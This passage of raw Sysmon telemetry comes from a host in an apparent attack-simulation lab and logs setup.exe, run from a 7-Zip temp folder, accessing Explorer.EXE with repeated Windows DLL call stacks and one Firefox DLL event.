l+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-convert-l1-1-0.dll2021-01-18 13:59:52.146 10341000x800000000000000014289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
